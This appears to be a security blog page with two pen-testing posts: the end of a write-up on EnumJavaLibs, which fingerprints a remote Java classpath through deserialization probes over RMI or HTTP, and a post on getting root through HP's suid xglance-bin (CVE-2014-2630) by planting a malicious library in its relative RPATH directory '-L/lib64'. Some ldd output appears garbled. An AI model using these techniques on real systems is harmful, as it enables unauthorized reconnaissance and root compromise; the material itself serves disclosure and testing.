EnumJavaLibs has a specific ‘RMI’ mode which allows you to specify the IP and port of the RMI service. It will then invoke the newClient() function for each serialized object from the jars in the database. Upon a deserialization error, we get the full stack trace back via RMI, so we can easily read whether the class was found or not – and conclude whether the library is on the classpath.

Web applications

Because the way to probe web applications is highly case-specific, EnumJavaLibs will not perform the HTTP requests for you. Instead, it will create a CSV file with (classname, base64_encoded_serialized_object) pairs, which you can then use to build the requests yourself. One way to do this is with Burp Intruder.


The tool uses a few Java ‘tricks’ that deserve some more detail. The first one is dynamic loading of libraries. This has been made a lot harder (but not impossible) since Java 11, which is why the tool should be compiled with Java 8. Using URLClassLoader.addURL(), it is possible to load a jar file specified by its path. Because this method is protected rather than part of the public API, reflection is required to make it accessible.
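The reflection trick looks roughly like this sketch (the jar path is hypothetical; note that on recent JVMs with strong encapsulation the setAccessible() call may be refused, which is handled here, and which is why compiling with Java 8 is recommended):

```java
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;

public class AddUrlDemo {
    public static void main(String[] args) throws Exception {
        URLClassLoader loader = new URLClassLoader(new URL[0]);
        URL jar = new URL("file:///tmp/hypothetical.jar"); // hypothetical jar path
        try {
            // addURL() is protected, so reflection is needed to reach it
            Method addURL = URLClassLoader.class.getDeclaredMethod("addURL", URL.class);
            addURL.setAccessible(true);
            addURL.invoke(loader, jar);
            System.out.println("added: " + loader.getURLs()[0]);
        } catch (Exception e) {
            // Java 16+ strong encapsulation can refuse setAccessible() here
            System.out.println("blocked: " + e);
        }
    }
}
```

Once the jar is on the classloader’s search path, its classes can be enumerated and loaded at runtime.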

Once we load the jar, we go through all of its classes one by one and try to serialize them. It doesn’t matter which class: all we want is some class from the jar file. If the remote server is able to deserialize this class, there is a high probability that the library it comes from is loaded. But how do we serialize an arbitrary class from a jar file? Normally, serialization happens as follows:

  1. Instantiate an object of the class with ‘new …’
  2. Serialize the object using ObjectOutputStream

To instantiate the object, though, we need information about its constructors. We could get that via reflection, but what if it has a constructor that takes another object as an argument? Or what if some conditions need to be met by these arguments, or else the constructor throws an exception? This results in a complex situation which is hard to handle automatically. Fortunately, there is a way to instantiate objects without invoking constructors. It’s not pretty. But it works.

It’s called the Unsafe class and it lets you do things that Java would normally forbid you to do (for good reasons). One of them is instantiating classes without invoking the constructor. This works for our purposes because at the remote side the ClassNotFoundException is thrown based on the name of the class – we don’t actually care about it being initialized properly. So after instantiation via Unsafe, we can serialize the object and – depending on how you run the tool – send it off over RMI or store the Base64-encoded version in the output file.
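A minimal sketch of the Unsafe trick (the Fussy class is a made-up stand-in for a library class with an inconvenient constructor): allocateInstance() creates the object without ever running the constructor, which would otherwise throw here.

```java
import java.lang.reflect.Field;
import sun.misc.Unsafe;

public class UnsafeDemo {
    static class Fussy implements java.io.Serializable {
        int marker;
        Fussy(int mustBePositive) { // inconvenient constructor: picky about its argument
            if (mustBePositive <= 0) throw new IllegalArgumentException();
            marker = mustBePositive;
        }
    }

    public static void main(String[] args) throws Exception {
        // Grab the Unsafe singleton via reflection (it has no public accessor)
        Field f = Unsafe.class.getDeclaredField("theUnsafe");
        f.setAccessible(true);
        Unsafe unsafe = (Unsafe) f.get(null);

        // allocateInstance() skips the constructor entirely:
        // no argument checks run, fields keep their default values
        Fussy obj = (Fussy) unsafe.allocateInstance(Fussy.class);
        System.out.println("constructor skipped, marker=" + obj.marker);
    }
}
```

The resulting object is in a “raw” state, but that is irrelevant: the remote side only needs to resolve its class name before any field values matter.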

False positives

It might happen that the class which is deserialized at the remote server can actually be traced back to multiple libraries. Recall that we distinguish classes based on the combination of fully qualified class name and SerialVersionUID. So when a serializable class doesn’t specify a custom SerialVersionUID in the source code, it is not unthinkable that a collision occurs (meaning the fully qualified name is the same). But even in this case we can still be pretty sure about which library is used – just not the exact version. Take for example “org.apache.commons.fileupload.DiskFileUpload”: we can be pretty sure it comes from the commons-fileupload library, even though we might be unable to identify the exact version because the SerialVersionUID is the same across different versions.
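For reference, the effective SerialVersionUID of any serializable class can be read with the JDK’s ObjectStreamClass – a quick sketch of the identity (fully qualified name plus SerialVersionUID) that the deduplication relies on:

```java
import java.io.ObjectStreamClass;

public class SuidDemo {
    public static void main(String[] args) {
        // lookup() returns the serialization descriptor of a class;
        // for classes without an explicit serialVersionUID the value
        // is computed from the class structure, so collisions are possible
        ObjectStreamClass desc = ObjectStreamClass.lookup(java.util.ArrayList.class);
        System.out.println(desc.getName() + ":" + desc.getSerialVersionUID());
    }
}
```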

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Privilege Escalation via HP xglance using perf-exploiter

In one of our recent penetration tests we abused a vulnerability affecting a suid binary called “xglance-bin“. Part of the HP Performance Monitoring solution, it allowed us to escalate our local unprivileged sessions on some Linux RHEL 7.x/8.x systems to root. To be honest, it was not the first time we leveraged that specific vulnerability: we have abused it frequently on many HP servers running RHEL since 2014.

A CVE was indeed registered for the flaw (CVE-2014-2630), originally discovered by Tim Brown of Portcullis. However, the description was a bit cryptic (aka completely useless) -> “Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors“. Unspecified vulnerability? Unknown vector? Well… to this day, there is no trace on the internet of a public exploit. Hence the idea to release our code.

Short description

Linux applications use shared libraries (.so extension), which are a bit like DLLs in Windows applications. An ELF binary needs to know where these .so libraries are stored, so that it can load them at execution time.

There are several methods for specifying the location of dynamic libraries:

  1. Using the “-rpath” or “--rpath-link” linker options when compiling the application.
  2. Using the environment variable LD_RUN_PATH.
  3. Using the environment variable LD_LIBRARY_PATH.
  4. Using the value of DT_RUNPATH or DT_RPATH, set with the “-rpath” option.
  5. Putting libraries into default /lib and /usr/lib directories.
  6. Specifying a directory containing libraries in /etc/

The objective of an attacker is to control one of the methods above in order to replace an existing dynamic library with a malicious one. This is the context of the vulnerability we exploited. Specifically, we took advantage of case 1.

$ objdump -x xglance-bin | grep RPATH
RPATH -L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64

Indeed, as the “objdump” output clearly shows, the RPATH method was used to specify the location of dynamic libraries for the binary. One of those entries, “-L/lib64”, is a relative path. We can simply create the directory “-L/lib64”, put in there a malicious library named after one of the libraries xglance-bin loads…

$ ldd /opt/perf/bin/xglance-bin
[...] => -L/lib64/ (0x00007f0fb2b92000) => -L/lib64/ (0x00007f0fb2990000)

…and then launch the binary “/opt/perf/bin/xglance-bin” to escalate to root. The code can be downloaded from GitHub and is quite self-explanatory. Just make the bash script executable and run it; it will perform all the exploitation steps for you. It needs a compiler to be present on the target machine. Alternatively, the library can be compiled on a compatible local system and then copied manually to the remote one.

A word should be spent on the symbols declared in the code itself, which make it quite big. This was due to some libraries that “xglance-bin” was trying to load but that were missing on the system we exploited. Instead of copying the absent libraries, we just declared all the missing symbols in our code (nm, grep and cut are always your friends). Your environment could be different and not require that.